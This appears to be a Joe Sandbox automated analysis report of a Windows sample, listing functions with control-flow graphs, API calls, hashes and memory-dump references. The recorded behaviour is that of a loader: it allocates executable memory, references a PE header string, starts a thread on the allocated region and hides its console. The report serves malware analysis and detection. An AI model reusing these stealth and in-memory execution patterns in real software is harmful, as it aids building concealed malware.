        control_flow_graph 87 114920-114948 call f7197 90 114961-114965 87->90 91 11494a-11495f 87->91 92 114969-11496c 90->92 91->92 93 1149a0-1149b6 92->93 94 11496e-114971 92->94 96 1149c0-1149d7 93->96 94->93 95 114973-114980 94->95 97 114982-114990 95->97 98 114996-11499d call f71c7 95->98 99 1149e6-1149f9 call f1850 96->99 100 1149d9-1149e4 96->100 97->98 102 114baa-114bce call fbc0f CreateThread WaitForSingleObject 97->102 98->93 104 1149fd-114a01 99->104 100->104 104->96 106 114a03-114a18 104->106 109 114a1a-114a20 106->109 110 114a8d-114a98 106->110 114 114ba0 call f3700 109->114 115 114a26-114a33 109->115 112 114b23-114b25 110->112 113 114a9e 110->113 116 114b52-114b62 call f71c7 112->116 117 114b27-114b34 112->117 119 114aa0-114b1d call f1160 call f1e70 call f1160 call f1e70 call fc78e 113->119 124 114ba5 call f36b0 114->124 120 114a60-114a62 115->120 121 114a35-114a3a 115->121 142 114b64-114b71 116->142 143 114b8d-114b9f call f71da 116->143 122 114b36-114b44 117->122 123 114b48-114b4f call f71c7 117->123 160 114b1f 119->160 128 114a75 120->128 129 114a64-114a73 call f7197 120->129 121->124 126 114a40-114a4b call f7197 121->126 122->102 131 114b46 122->131 123->116 124->102 126->102 148 114a51-114a5e 126->148 130 114a77-114a8a call f8440 128->130 129->130 130->110 131->123 149 114b83-114b8a call f71c7 142->149 150 114b73-114b81 142->150 148->130 149->143 150->102 150->149 160->112
        APIs
        • CreateThread.KERNELBASE(00000000,00000000,00114BD0,00000000,00000000,00000000), ref: 00114BBF
        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00114C76), ref: 00114BC8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CreateObjectSingleThreadWait
        • String ID: C$Earth$Own head
        • API String ID: 1891408510-3365287836
        • Opcode ID: 31ae03ccb2ad55af86e0df196d530a29d97038cc79a79fe72301634f11ac2591
        • Instruction ID: 6df77a4c96a97a777ee052705db83638bbb4226d1a30e51c5e5f3048cb362396
        • Opcode Fuzzy Hash: 31ae03ccb2ad55af86e0df196d530a29d97038cc79a79fe72301634f11ac2591
        • Instruction Fuzzy Hash: 83716471A083058BD718DF748CC5BEBB7E4AF88740F140A3CF59697592E760EA88C796
        Function 00106AF1 Relevance: .0, Instructions: 29COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 187476d68e2606cdce371126295309166868084c328b2d7ce50f7c335d6a9bbd
        • Instruction ID: c1f723b623ad3002038ea3619755f7af699cac35751f7d0f9db5fda30546dd1c
        • Opcode Fuzzy Hash: 187476d68e2606cdce371126295309166868084c328b2d7ce50f7c335d6a9bbd
        • Instruction Fuzzy Hash: 36F0A071A11320DBCB16C748C405B9973FCEB08B11F1140A6E440EB180C7B0DE40C7D0
        Function 00114D20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 61libraryloaderCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • GetModuleHandleA.KERNEL32(user32.dll,ShowWindow,429EDEEC), ref: 00114D55
        • GetProcAddress.KERNEL32(00000000), ref: 00114D5C
        • GetConsoleWindow.KERNELBASE(?,00000000), ref: 00114D6B
        • GetModuleHandleA.KERNEL32(kernel32.dll,FreeConsole), ref: 00114D7F
        • GetProcAddress.KERNEL32(00000000), ref: 00114D86
        • FreeConsole.KERNELBASE ref: 00114D92
          • Part of subcall function 00114000: GetCurrentThreadId.KERNEL32 ref: 0011406A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AddressConsoleHandleModuleProc$CurrentFreeThreadWindow
        • String ID: FreeConsole$ShowWindow$kernel32.dll$user32.dll
        • API String ID: 245968307-4003964729
        • Opcode ID: a7e3879722f35b4b1906ef073c510f59344a0ce5d58ee2e24ca33ba75d0a4cbb
        • Instruction ID: 3c5e3d67fa50986d53e28f89bb7642491ca829d96c351b7403ea188f170bd4b5
        • Opcode Fuzzy Hash: a7e3879722f35b4b1906ef073c510f59344a0ce5d58ee2e24ca33ba75d0a4cbb
        • Instruction Fuzzy Hash: E911B271A40704EBDB04EBF4ED09BDEBBF9EB88B51F108535F515D3680E774998086A1
        Function 00106494 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 32 106494-1064a0 33 106532-106535 32->33 34 1064a5-1064b6 33->34 35 10653b 33->35 37 1064c3-1064dc LoadLibraryExW 34->37 38 1064b8-1064bb 34->38 36 10653d-106541 35->36 41 106542-106552 37->41 42 1064de-1064e7 GetLastError 37->42 39 1064c1 38->39 40 10655b-10655d 38->40 44 10652f 39->44 40->36 41->40 43 106554-106555 FreeLibrary 41->43 45 106520-10652d 42->45 46 1064e9-1064fb call 103e68 42->46 43->40 44->33 45->44 46->45 49 1064fd-10650f call 103e68 46->49 49->45 52 106511-10651e LoadLibraryExW 49->52 52->41 52->45
        APIs
        • FreeLibrary.KERNEL32(00000000,?,001065A1,?,?,00000001,00000000,?,?,0010680B,00000021,FlsSetValue,001194CC,001194D4,00000001), ref: 00106555
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FreeLibrary
        • String ID: api-ms-$ext-ms-
        • API String ID: 3664257935-537541572
        • Opcode ID: d286f0bf8783b03e52e71f07f2a4e65ca7e54f6b482fa8148d2b76966a032b9f
        • Instruction ID: d0c55aa1a2788ec2d02509efb939ba710c8e86ad815d905160a517f432bf6c4c
        • Opcode Fuzzy Hash: d286f0bf8783b03e52e71f07f2a4e65ca7e54f6b482fa8148d2b76966a032b9f
        • Instruction Fuzzy Hash: F3213A32A01321EBCB269B64EC44A9A3768DF467B0F114160F986E72D4DBB0EF50C6D0
        Function 00114000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0011406A
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140A5
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140AC
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140B3
        • std::_Throw_Cpp_error.LIBCPMT ref: 001140BA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Cpp_errorThrow_std::_$CurrentThread
        • String ID: Success created.
        • API String ID: 2261580123-2637490038
        • Opcode ID: a4626639991cd517abe6e7bca2d15cb689551c728d09833b2ed92192369fa062
        • Instruction ID: 4a84fcf157ef59b0985518eebb106cb70628e06111e9db252884a31e9890f08f
        • Opcode Fuzzy Hash: a4626639991cd517abe6e7bca2d15cb689551c728d09833b2ed92192369fa062
        • Instruction Fuzzy Hash: A111A7716407056BE3743BB54C03BEB7594AF05F82F144539FB48AA9C3EBA2944497A2
        Function 000FE516 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 161 fe516-fe521 162 fe537-fe54a call fe4c6 161->162 163 fe523-fe536 call ff3fe call fbbff 161->163 169 fe54c-fe569 CreateThread 162->169 170 fe578 162->170 172 fe56b-fe577 GetLastError call ff3a4 169->172 173 fe587-fe58c 169->173 174 fe57a-fe586 call fe438 170->174 172->170 175 fe58e-fe591 173->175 176 fe593-fe597 173->176 175->176 176->174
        APIs
        • CreateThread.KERNELBASE(?,?,Function_0000E3BA,00000000,?,?), ref: 000FE55F
        • GetLastError.KERNEL32 ref: 000FE56B
        • __dosmaperr.LIBCMT ref: 000FE572
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CreateErrorLastThread__dosmaperr
        • String ID:
        • API String ID: 2744730728-0
        • Opcode ID: cf9ff95f71fb63d13eec6e6f3b082a7032d81260bf2d5885d4ff61af5b59530f
        • Instruction ID: 99cb7cff44634802c38a76902e74741c48346035791924527e2f5621ac5f3c3b
        • Opcode Fuzzy Hash: cf9ff95f71fb63d13eec6e6f3b082a7032d81260bf2d5885d4ff61af5b59530f
        • Instruction Fuzzy Hash: 8B01DE7290124DEFDF159FA0CC05AFE3BA5EF40724F004028FA01969A1EB70CA50FBA0
        Function 00108A6D Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 207 108a6d-108a8c 208 108a92-108a94 207->208 209 108c66 207->209 210 108ac0-108ae6 208->210 211 108a96-108ab5 call fbb82 208->211 212 108c68-108c6c 209->212 214 108ae8-108aea 210->214 215 108aec-108af2 210->215 218 108ab8-108abb 211->218 214->215 217 108af4-108afe 214->217 215->211 215->217 219 108b00-108b0b call 10a24b 217->219 220 108b0e-108b19 call 1085f1 217->220 218->212 219->220 225 108b5b-108b6d 220->225 226 108b1b-108b20 220->226 229 108bbe-108bde WriteFile 225->229 230 108b6f-108b75 225->230 227 108b22-108b26 226->227 228 108b45-108b59 call 1081b7 226->228 231 108b2c-108b3b call 108589 227->231 232 108c2e-108c40 227->232 249 108b3e-108b40 228->249 234 108be0-108be6 GetLastError 229->234 235 108be9 229->235 236 108b77-108b7a 230->236 237 108bac-108bb7 call 10866f 230->237 231->249 238 108c42-108c48 232->238 239 108c4a-108c5c 232->239 234->235 243 108bec-108bf7 235->243 244 108b9a-108baa call 108833 236->244 245 108b7c-108b7f 236->245 248 108bbc 237->248 238->209 238->239 239->218 250 108c61-108c64 243->250 251 108bf9-108bfe 243->251 254 108b95-108b98 244->254 245->232 252 108b85-108b90 call 10874a 245->252 248->254 249->243 250->212 255 108c00-108c05 251->255 256 108c2c 251->256 252->254 254->249 258 108c07-108c19 255->258 259 108c1e-108c27 call ff3c7 255->259 256->232 258->218 259->218
        APIs
          • Part of subcall function 001081B7: GetConsoleOutputCP.KERNEL32(429EDEEC,00000000,00000000,00000000), ref: 0010821A
        • WriteFile.KERNEL32(?,00000000,?,0011F498,00000000,0000000C,00000000,00000000,?,00000000,0011F498,00000010,00100642,00000000,00000000,00000000), ref: 00108BD6
        • GetLastError.KERNEL32(?,00000000), ref: 00108BE0
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ConsoleErrorFileLastOutputWrite
        • String ID:
        • API String ID: 2915228174-0
        • Opcode ID: 2e902ea2d15e57685d848a5aa034b40d074fb4c9b964558d5d85f17a0644362b
        • Instruction ID: c1c54f07a84d86c4618f77f994cd63e952c090bd49637b310402f599c1a6fbd3
        • Opcode Fuzzy Hash: 2e902ea2d15e57685d848a5aa034b40d074fb4c9b964558d5d85f17a0644362b
        • Instruction Fuzzy Hash: 7761B3B1D08249EFDF158FA8C984AEEBBB9EF19304F144055E8C4A7292DBB1D941CB60
        Function 00114BD0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 262 114bd0-114c42 call f13f0 call f7197 267 114c44-114c55 call 1140c0 262->267 268 114c58-114cb1 VirtualAlloc call 114920 call 1145d0 262->268 267->268 276 114cb3-114cbe 268->276 277 114cda-114cea call f71da 268->277 279 114cd0-114cd2 call f71c7 276->279 280 114cc0-114cce 276->280 285 114cd7 279->285 280->279 282 114ceb-114cf0 call fbc0f 280->282 285->277
        APIs
        • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 00114C66
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AllocVirtual
        • String ID: MZx
        • API String ID: 4275171209-2575928145
        • Opcode ID: 3423983b1c73f3c931f42c26971118d040d1e4f6179b30d4f0f1280b34241f6c
        • Instruction ID: 6f963326315edf353d158c0f7a91b20700c8b4b3e12a0d87616c942631ada40c
        • Opcode Fuzzy Hash: 3423983b1c73f3c931f42c26971118d040d1e4f6179b30d4f0f1280b34241f6c
        • Instruction Fuzzy Hash: 0031A375E003089BDB04DFA8DD81BEEB7B4EF1D740F104269F904B7682EB759A948764
        Function 0010866F Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 287 10866f-1086c4 call f7f50 290 1086c6 287->290 291 108739-108749 call f71da 287->291 293 1086cc 290->293 295 1086d2-1086d4 293->295 296 1086d6-1086db 295->296 297 1086ee-108713 WriteFile 295->297 300 1086e4-1086ec 296->300 301 1086dd-1086e3 296->301 298 108731-108737 GetLastError 297->298 299 108715-108720 297->299 298->291 299->291 302 108722-10872d 299->302 300->295 300->297 301->300 302->293 303 10872f 302->303 303->291
        APIs
        • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00108BBC,00000000,00000000,00000000,?,0000000C,00000000), ref: 0010870B
        • GetLastError.KERNEL32(?,00108BBC,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,0011F498,00000010,00100642,00000000,00000000), ref: 00108731
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID:
        • API String ID: 442123175-0
        • Opcode ID: 30eda54b36b46e10513e3154b2e047d98c9ff8654da0febdb2f77b739ef01fa7
        • Instruction ID: f37a99e807d4a647757bc86a65174b219e453600ab575909730c64add7b7b6b7
        • Opcode Fuzzy Hash: 30eda54b36b46e10513e3154b2e047d98c9ff8654da0febdb2f77b739ef01fa7
        • Instruction Fuzzy Hash: 9121A234A00219DBCB19CF29DC909EDB7B5EB4C301F2480A9EA8AD7251DB709D82CB61
        Function 00106182 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 304 106182-106187 305 106189-1061a1 304->305 306 1061a3-1061a7 305->306 307 1061af-1061b8 305->307 306->307 308 1061a9-1061ad 306->308 309 1061ca 307->309 310 1061ba-1061bd 307->310 311 106224-106228 308->311 314 1061cc-1061d9 GetStdHandle 309->314 312 1061c6-1061c8 310->312 313 1061bf-1061c4 310->313 311->305 315 10622e-106231 311->315 312->314 313->314 316 106206-106218 314->316 317 1061db-1061dd 314->317 316->311 319 10621a-10621d 316->319 317->316 318 1061df-1061e8 GetFileType 317->318 318->316 320 1061ea-1061f3 318->320 319->311 321 1061f5-1061f9 320->321 322 1061fb-1061fe 320->322 321->311 322->311 323 106200-106204 322->323 323->311
        APIs
        • GetStdHandle.KERNEL32(000000F6), ref: 001061CE
        • GetFileType.KERNELBASE(00000000), ref: 001061E0
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FileHandleType
        • String ID:
        • API String ID: 3000768030-0
        • Opcode ID: db693a10bf974189e642e8a96329801449ac4d79d5136970c2f0366c7da497ae
        • Instruction ID: 33543366ed0b741e81838742a25f54860137798cee1cd648fe2ba546298aa2ca
        • Opcode Fuzzy Hash: db693a10bf974189e642e8a96329801449ac4d79d5136970c2f0366c7da497ae
        • Instruction Fuzzy Hash: 4A11E9315047429ADB344F3EDC886267ED59B96330B380719E0FAC65F2C3B0D8E6D641
        Function 000FE3BA Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • GetLastError.KERNEL32(0011F048,0000000C), ref: 000FE3CD
        • ExitThread.KERNEL32 ref: 000FE3D4
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorExitLastThread
        • String ID:
        • API String ID: 1611280651-0
        • Opcode ID: 600bba551166580000cda6da0c5bbfb624b86c87f2ba4ac0579bbf67c78fac5f
        • Instruction ID: c48a4242df8a4864de0ad56d3d603d5efcab7aab034c40f27dbca0987a1e06ca
        • Opcode Fuzzy Hash: 600bba551166580000cda6da0c5bbfb624b86c87f2ba4ac0579bbf67c78fac5f
        • Instruction Fuzzy Hash: 4AF0C270940608EFDB14ABB0D94AAAE3BB1FF59700F108159F5019BAA2CBB45A41DBA1
        Function 00104F0C Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 343 104f0c-104f15 344 104f44-104f45 343->344 345 104f17-104f2a RtlFreeHeap 343->345 345->344 346 104f2c-104f43 GetLastError call ff361 call ff3fe 345->346 346->344
        APIs
        • RtlFreeHeap.NTDLL(00000000,00000000,?,0010C57D,?,00000000,?,?,0010C81E,?,00000007,?,?,0010CD17,?,?), ref: 00104F22
        • GetLastError.KERNEL32(?,?,0010C57D,?,00000000,?,?,0010C81E,?,00000007,?,?,0010CD17,?,?), ref: 00104F2D
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorFreeHeapLast
        • String ID:
        • API String ID: 485612231-0
        • Opcode ID: 15ccec119d61075604fe64e8038ea3f5afe21195b8763fd76dd59e1d4262285f
        • Instruction ID: 4e0f9c11f8f9276b4030658de06adbf9d4240895c3b84268de6aee39612568c8
        • Opcode Fuzzy Hash: 15ccec119d61075604fe64e8038ea3f5afe21195b8763fd76dd59e1d4262285f
        • Instruction Fuzzy Hash: 02E08631100605ABCB152BA4ED09BE93A599F84755F104060F70C9A4A1DF7089C08794
        Function 000F625D Relevance: 1.6, APIs: 1, Instructions: 108COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 351 f625d-f6277 352 f6279-f627b 351->352 353 f6280-f6288 351->353 354 f6357-f6364 call f71da 352->354 355 f62ac-f62b0 353->355 356 f628a-f6294 353->356 357 f62b6-f62c7 call f60c1 355->357 358 f6353 355->358 356->355 360 f6296-f62a7 356->360 366 f62cf-f6303 357->366 367 f62c9-f62cd 357->367 362 f6356 358->362 364 f634f-f6351 360->364 362->354 364->362 374 f6326-f632e 366->374 375 f6305-f6308 366->375 368 f6316 call f59a3 367->368 371 f631b-f631f 368->371 371->364 373 f6321-f6324 371->373 373->364 376 f6343-f634d 374->376 377 f6330-f6341 call 1006cb 374->377 375->374 378 f630a-f630e 375->378 376->358 376->364 377->358 377->376 378->358 380 f6310-f6313 378->380 380->368
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 36a114f48129b07f88941a07a36be4ddfa0f47e9764112a92cdab29d78eeb2f4
        • Instruction ID: d65d6e04093454cbda1f648eedd76d67f726e25cb520418a51a8e878b62e0979
        • Opcode Fuzzy Hash: 36a114f48129b07f88941a07a36be4ddfa0f47e9764112a92cdab29d78eeb2f4
        • Instruction Fuzzy Hash: D531983191051E9FCB55CF64C9409FDB7F9BF09310B184159D601A3A90EB72EE44DB50
        Function 0010655F Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 382 10655f-106587 383 106589-10658b 382->383 384 10658d-10658f 382->384 385 1065de-1065e1 383->385 386 106591-106593 384->386 387 106595-10659c call 106494 384->387 386->385 389 1065a1-1065a5 387->389 390 1065c4-1065db 389->390 391 1065a7-1065b5 GetProcAddress 389->391 393 1065dd 390->393 391->390 392 1065b7-1065c2 call 1016d1 391->392 392->393 393->385
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 902c9b452677ec06fdcb28c7a560fece48e1bbe08c6f0f9a33ff59ca2c123724
        • Instruction ID: 5b67ad2fd7586c6550277ecc2c2481a61bc17f84157a10a8010e8f6a43f7eec7
        • Opcode Fuzzy Hash: 902c9b452677ec06fdcb28c7a560fece48e1bbe08c6f0f9a33ff59ca2c123724
        • Instruction Fuzzy Hash: EC01D437700225AFDB269F69EC4195A37E7ABC53F07298620F944CB5D8EBB0D861C790

        Non-executed Functions

        Function 0010E8C8 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: __floor_pentium4
        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
        • API String ID: 4168288129-2761157908
        • Opcode ID: 09f575395fc5b91562471791b254729d5b340b94d6b688dc575fe1ada46878e0
